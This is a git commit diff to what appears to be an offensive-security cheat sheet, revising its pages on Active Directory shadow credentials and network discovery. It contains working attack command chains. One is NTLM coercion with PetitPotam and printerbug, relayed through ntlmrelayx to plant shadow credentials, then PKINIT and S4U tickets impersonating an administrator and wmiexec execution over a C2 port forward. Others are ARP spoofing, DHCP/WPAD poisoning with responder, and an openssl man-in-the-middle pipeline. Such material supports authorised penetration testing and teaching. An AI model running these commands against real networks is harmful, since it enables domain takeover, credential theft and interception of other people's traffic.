Shadows Credential + Network Enumeration
parent
b71698c495
commit
7257e153b8
|
@ -39,38 +39,36 @@
|
||||||
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e"
|
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e"
|
||||||
```
|
```
|
||||||
|
|
||||||
**Scenario**:
|
## Scenario
|
||||||
|
|
||||||
- **Scenario 1**: Shadow Credential relaying
|
### Shadow Credential Relaying
|
||||||
- Trigger an NTLM authentication from `DC01` (PetitPotam)
|
|
||||||
- Relay it to `DC02` (ntlmrelayx)
|
|
||||||
- Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker)
|
|
||||||
- Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`
|
|
||||||
|
|
||||||
- **Scenario 2**: Workstation Takeover with RBCD
|
- Trigger an NTLM authentication from `DC01` (PetitPotam)
|
||||||
```ps1
|
- Relay it to `DC02` (ntlmrelayx)
|
||||||
# Only for C2: Add Reverse Port Forward from 8081 to Team Server 81
|
- Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker)
|
||||||
|
- Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`
|
||||||
|
|
||||||
# Set up ntlmrelayx to relay authentication from target workstation to DC
|
|
||||||
proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81
|
|
||||||
|
|
||||||
# Execute printer bug to trigger authentication from target workstation
|
### Workstation Takeover with RBCD
|
||||||
proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file
|
|
||||||
|
|
||||||
# Get a TGT using the newly acquired certificate via PKINIT
|
**Requirements**:
|
||||||
proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR
|
|
||||||
|
|
||||||
# Get a ST (service ticket) for the target account
|
* `Print Spooler` service running
|
||||||
proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v
|
* `WebClient service` running
|
||||||
|
|
||||||
# Utilize the ST for future activity
|
**Exploitation**:
|
||||||
export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache
|
|
||||||
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
|
* Using your C2, start a reverse socks on port 1080: `socks 1080`
|
||||||
```
|
* Enable port forward from port 8081 to 81 on the compromised machine: `rportfwd 8081 127.0.0.1 81`
|
||||||
|
* Start the relay: `proxychains python3 ntlmrelayx.py -t ldaps://dc.domain.lab --shadow-credentials --shadow-target target\$ --http-port 81`
|
||||||
|
* Trigger a callback on webdav: `proxychains python3 printerbug.py domain.lab/user:password@target.domain.lab compromised@8081/file`
|
||||||
|
* Use [PKINIT](https://github.com/dirkjanm/PKINITtools) to get a TGT for the machine account: `proxychains python3 gettgtpkinit.py domain.lab/target\$ target.ccache -cert-pfx </path/from/previous/command.pfx> -pfx-pass <pfx-pass>`
|
||||||
|
* Elevate your privileges by creating a service ticket impersonating a local admin: `proxychains python3 gets4uticket.py kerberos+ccache://domain.lab\\target\$:target.ccache@dc.domain.lab cifs/target.domain.lab@domain.lab administrator@domain.lab administrator_target.ccache -v`
|
||||||
|
* Use your ticket: `export KRB5CCNAME=/path/to/administrator_target.ccache; proxychains python3 wmiexec.py -k -no-pass domain.lab/administrator@target.domain.lab`
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Shadow Credentials: Workstation Takeover Edition - Matthew Creel](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition)
|
* [Shadow Credentials: Workstation Takeover Edition - Matthew Creel - October 21, 2021](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition)
|
||||||
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
|
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
|
||||||
* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)
|
* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)
|
|
@ -1,28 +1,110 @@
|
||||||
# Network Discovery
|
# Network Discovery
|
||||||
|
|
||||||
## Summary
|
## DHCP
|
||||||
|
|
||||||
- [Nmap](#nmap)
|
DHCP (Dynamic Host Configuration Protocol) is a networking protocol used to automatically assign IP addresses and other network configuration parameters to devices on a network. DHCP allows devices to obtain necessary network configuration information from a DHCP server, rather than having to be manually configured.
|
||||||
- [Network Scan with nc and ping](#network-scan-with-nc-and-ping)
|
|
||||||
- [Spyse](#spyse)
|
|
||||||
- [Masscan](#masscan)
|
|
||||||
- [Netdiscover](#netdiscover)
|
|
||||||
- [Responder](#responder)
|
|
||||||
- [Bettercap](#bettercap)
|
|
||||||
- [Reconnoitre](#reconnoitre)
|
|
||||||
- [SSL MITM with OpenSSL](#ssl-mitm-with-openssl)
|
|
||||||
- [References](#references)
|
|
||||||
|
|
||||||
## Nmap
|
```ps1
|
||||||
|
sudo nmap --script broadcast-dhcp-discover
|
||||||
* Ping sweep (No port scan, No DNS resolution)
|
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-04 11:15 CET
|
||||||
|
Pre-scan script results:
|
||||||
```powershell
|
| broadcast-dhcp-discover:
|
||||||
nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
|
| Response 1 of 1:
|
||||||
-sn : Disable port scanning. Host discovery only.
|
| Interface: eth0
|
||||||
-n : Never do DNS resolution
|
| IP Offered: 192.168.1.111
|
||||||
|
| DHCP Message Type: DHCPOFFER
|
||||||
|
| Server Identifier: 192.168.1.254
|
||||||
|
| IP Address Lease Time: 1d00h00m00s
|
||||||
|
| Renewal Time Value: 12h00m00s
|
||||||
|
| Rebinding Time Value: 21h00m00s
|
||||||
|
| Broadcast Address: 192.168.1.255
|
||||||
|
| Hostname: Host-005
|
||||||
|
| Domain Name Server: 192.168.1.254
|
||||||
|
| Domain Name: lan
|
||||||
|
| Router: 192.168.1.254
|
||||||
|
|_ Subnet Mask: 255.255.255.0
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## DNS
|
||||||
|
|
||||||
|
* AD DNS
|
||||||
|
* LDAP: `nslookup -type=srv _ldap._tcp.dc._msdcs.<domain name>`
|
||||||
|
* KDC: `nslookup -type=srv _kerberos._tcp.<domain name>`
|
||||||
|
* Global catalog: `nslookup -type=srv _ldap._tcp.<domain name>`
|
||||||
|
|
||||||
|
|
||||||
|
## NBT-NS
|
||||||
|
|
||||||
|
NS (Name Service) is a component of NBT that provides name resolution services for NETBIOS names. In the context of NBT, NS is responsible for mapping NETBIOS names to IP addresses.
|
||||||
|
|
||||||
|
NBT NS uses a distributed database to store NETBIOS name-to-IP address mappings. Each computer on the network is responsible for registering its own name and IP address in the database, and for resolving names to IP addresses when necessary. When a computer needs to resolve a NETBIOS name to an IP address, it sends a query to the NBT NS service on another computer on the network. The NBT NS service responds with the IP address associated with the requested name, if it is known. It works on `UDP, Port 137`.
|
||||||
|
|
||||||
|
* Get names: `nbtscan -r 192.168.1.0/24`
|
||||||
|
* Get the name for a single IP: `nmblookup -A <IP>`
|
||||||
|
|
||||||
|
|
||||||
|
## MDNS
|
||||||
|
|
||||||
|
MDNS (Multicast Domain Name System) is a protocol used for zero-configuration networking, also known as "zeroconf". It allows devices on a local network to automatically discover each other and resolve hostnames to IP addresses without the need for a centralized DNS server.
|
||||||
|
|
||||||
|
MDNS works by using multicast addresses to send DNS queries and responses. When a device wants to resolve a hostname to an IP address, it sends a multicast DNS query to a special multicast address (224.0.0.251 for IPv4 and ff02::fb for IPv6). Any device on the network that is listening for multicast DNS queries and has a matching hostname will respond with its IP address.
|
||||||
|
|
||||||
|
```
|
||||||
|
mdns-scan
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## ARP
|
||||||
|
|
||||||
|
ARP (Address Resolution Protocol) is a networking protocol used to map IP addresses to MAC (Media Access Control) addresses on a local area network (LAN).
|
||||||
|
|
||||||
|
* ARP scan
|
||||||
|
```ps1
|
||||||
|
root@kali:~# arp-scan -l
|
||||||
|
Interface: eth0, datalink type: EN10MB (Ethernet)
|
||||||
|
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
|
||||||
|
172.16.193.1 00:50:56:c0:00:08 VMware, Inc.
|
||||||
|
172.16.193.2 00:50:56:f1:18:a8 VMware, Inc.
|
||||||
|
172.16.193.254 00:50:56:e5:7b:87 VMware, Inc.
|
||||||
|
```
|
||||||
|
|
||||||
|
* ARP spoof with `arpspoof`
|
||||||
|
```ps1
|
||||||
|
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
|
||||||
|
arpspoof -i wlan0 -t 10.0.0.X 10.0.0.Y
|
||||||
|
```
|
||||||
|
|
||||||
|
* ARP spoof with `Bettercap`
|
||||||
|
```ps1
|
||||||
|
sudo bettercap -iface wlan0
|
||||||
|
net.probe on
|
||||||
|
set arp.spoof.targets <target_IP>
|
||||||
|
arp.spoof on
|
||||||
|
net.sniff on
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Ping
|
||||||
|
|
||||||
|
* Ping sweep with `nmap`: no port scan, no DNS resolution
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
|
||||||
|
-sn : Disable port scanning. Host discovery only.
|
||||||
|
-n : Never do DNS resolution
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## LDAP
|
||||||
|
|
||||||
|
* Null bind connection: `ldapsearch -x -h <ip> -s base`
|
||||||
|
|
||||||
|
|
||||||
|
## Port Scans and Enumeration
|
||||||
|
|
||||||
|
### Nmap
|
||||||
|
|
||||||
* Basic NMAP
|
* Basic NMAP
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
@ -100,22 +182,30 @@ Host script results:
|
||||||
List Nmap scripts : ls /usr/share/nmap/scripts/
|
List Nmap scripts : ls /usr/share/nmap/scripts/
|
||||||
```
|
```
|
||||||
|
|
||||||
## Network Scan with nc and ping
|
### Network Scan with nc and ping
|
||||||
|
|
||||||
Sometimes we want to perform network scan without any tools like nmap. So we can use the commands `ping` and `nc` to check if a host is up and which port is open.
|
Sometimes we want to perform network scan without any tools like nmap. So we can use the commands `ping` and `nc` to check if a host is up and which port is open.
|
||||||
|
|
||||||
To check if hosts are up on a /24 range
|
To check if hosts are up on a /24 range
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP"; fi ; done
|
for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP"; fi ; done
|
||||||
```
|
```
|
||||||
|
|
||||||
To check which ports are open on a specific host
|
To check which ports are open on a specific host
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
for i in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.18 $i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.18 has port $i open"; fi ; done
|
for i in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.18 $i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.18 has port $i open"; fi ; done
|
||||||
```
|
```
|
||||||
|
|
||||||
Both at the same time on a /24 range
|
Both at the same time on a /24 range
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP:"; for j in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "\t192.168.1.$i has port $j open"; fi ; done ; fi ; done
|
for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP:"; for j in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "\t192.168.1.$i has port $j open"; fi ; done ; fi ; done
|
||||||
```
|
```
|
||||||
|
|
||||||
Not in one-liner version:
|
Not in one-liner version:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
for i in `seq 1 255`;
|
for i in `seq 1 255`;
|
||||||
do
|
do
|
||||||
|
@ -136,34 +226,7 @@ done
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Spyse
|
### Masscan
|
||||||
* Spyse API - for detailed info is better to check [Spyse](https://spyse.com/)
|
|
||||||
|
|
||||||
* [Spyse Wrapper](https://github.com/zeropwn/spyse.py)
|
|
||||||
|
|
||||||
#### Searching for subdomains
|
|
||||||
```bash
|
|
||||||
spyse -target xbox.com --subdomains
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Reverse IP Lookup
|
|
||||||
```bash
|
|
||||||
spyse -target 52.14.144.171 --domains-on-ip
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Searching for SSL certificates
|
|
||||||
```bash
|
|
||||||
spyse -target hotmail.com --ssl-certificates
|
|
||||||
```
|
|
||||||
```bash
|
|
||||||
spyse -target "org: Microsoft" --ssl-certificates
|
|
||||||
```
|
|
||||||
#### Getting all DNS records
|
|
||||||
```bash
|
|
||||||
spyse -target xbox.com --dns-all
|
|
||||||
```
|
|
||||||
|
|
||||||
## Masscan
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
|
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
|
||||||
|
@ -186,7 +249,7 @@ UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut
|
||||||
[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP
|
[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP
|
||||||
```
|
```
|
||||||
|
|
||||||
## Reconnoitre
|
### Reconnoitre
|
||||||
|
|
||||||
Dependencies:
|
Dependencies:
|
||||||
|
|
||||||
|
@ -225,7 +288,14 @@ responder.py -I eth0 -wrf
|
||||||
|
|
||||||
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
|
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
|
||||||
|
|
||||||
## Bettercap
|
## MITM
|
||||||
|
|
||||||
|
* WSUS poisoning
|
||||||
|
* ARP poisoning
|
||||||
|
* DHCP poisoning: `responder --interface "eth0" --DHCP --wpad`
|
||||||
|
|
||||||
|
|
||||||
|
### Bettercap
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
bettercap -X --proxy --proxy-https -T <target IP>
|
bettercap -X --proxy --proxy-https -T <target IP>
|
||||||
|
@ -234,23 +304,32 @@ bettercap -X --proxy --proxy-https -T <target IP>
|
||||||
# targetting specific IP only
|
# targetting specific IP only
|
||||||
```
|
```
|
||||||
|
|
||||||
## SSL MITM with OpenSSL
|
|
||||||
|
### SSL MITM with OpenSSL
|
||||||
|
|
||||||
This code snippet allows you to sniff/modify SSL traffic if there is a MITM vulnerability using only openssl.
|
This code snippet allows you to sniff/modify SSL traffic if there is a MITM vulnerability using only openssl.
|
||||||
If you can modify `/etc/hosts` of the client:
|
If you can modify `/etc/hosts` of the client:
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
sudo echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" >> /etc/hosts # On client host
|
sudo echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" >> /etc/hosts # On client host
|
||||||
```
|
```
|
||||||
|
|
||||||
On our MITM server, if the client accepts self signed certificates (you can use a legit certificate if you have the private key of the legit server):
|
On our MITM server, if the client accepts self signed certificates (you can use a legit certificate if you have the private key of the legit server):
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
openssl req -subj '/CN=[domain.of.server.to.mitm]' -batch -new -x509 -days 365 -nodes -out server.pem -keyout server.pem
|
openssl req -subj '/CN=[domain.of.server.to.mitm]' -batch -new -x509 -days 365 -nodes -out server.pem -keyout server.pem
|
||||||
```
|
```
|
||||||
|
|
||||||
On our MITM server, we setup our infra:
|
On our MITM server, we setup our infra:
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
mkfifo response
|
mkfifo response
|
||||||
sudo openssl s_server -cert server.pem -accept [INTERFACE TO LISTEN TO]:[PORT] -quiet < response | tee | openssl s_client -quiet -servername [domain.of.server.to.mitm] -connect[IP of server to MITM]:[PORT] | tee | cat > response
|
sudo openssl s_server -cert server.pem -accept [INTERFACE TO LISTEN TO]:[PORT] -quiet < response | tee | openssl s_client -quiet -servername [domain.of.server.to.mitm] -connect[IP of server to MITM]:[PORT] | tee | cat > response
|
||||||
```
|
```
|
||||||
|
|
||||||
In this example, traffic is only displayed with `tee` but we could modify it using `sed` for example.
|
In this example, traffic is only displayed with `tee` but we could modify it using `sed` for example.
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [TODO](TODO)
|
* [Pwning the Domain: Credentialess/Username - hadess - February 7, 2024 ](https://hadess.io/pwning-the-domain-credentialess-username/)
|
||||||
|
|
Loading…
Reference in New Issue